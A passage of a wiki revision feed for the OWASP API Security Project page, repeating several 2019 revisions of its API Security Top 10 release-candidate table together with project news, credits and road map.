| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf Presentation of the Release Candidate of the API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://ams.globalappsec.org/ OWASP Global AppSec Amsterdam]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC - Global AppSec AMS.pdf|thumb|Presentation - API Security Top 10 RC - Global AppSec AMS]]&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:API_Security_Top_10_RC_-_Global_AppSec_AMS.pdf&amp;diff=255021</id>
		<title>File:API Security Top 10 RC - Global AppSec AMS.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:API_Security_Top_10_RC_-_Global_AppSec_AMS.pdf&amp;diff=255021"/>
				<updated>2019-09-30T10:18:34Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;API Security Top 10 RC - Global AppSec AMS&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255020</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255020"/>
				<updated>2019-09-30T10:11:16Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and was presented during Global AppSec DC 2019 and Global AppSec Amsterdam 2019. Links to the presentations can be found in the News section on the right.&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf Presentation of the Release Candidate of the API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254719</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254719"/>
				<updated>2019-09-13T13:20:06Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and will be presented in-depth during [https://globalappsecdc2019.sched.com/event/SxDz/api-security-project Global AppSec DC 2019].&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf Presentation of the Release Candidate of the API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
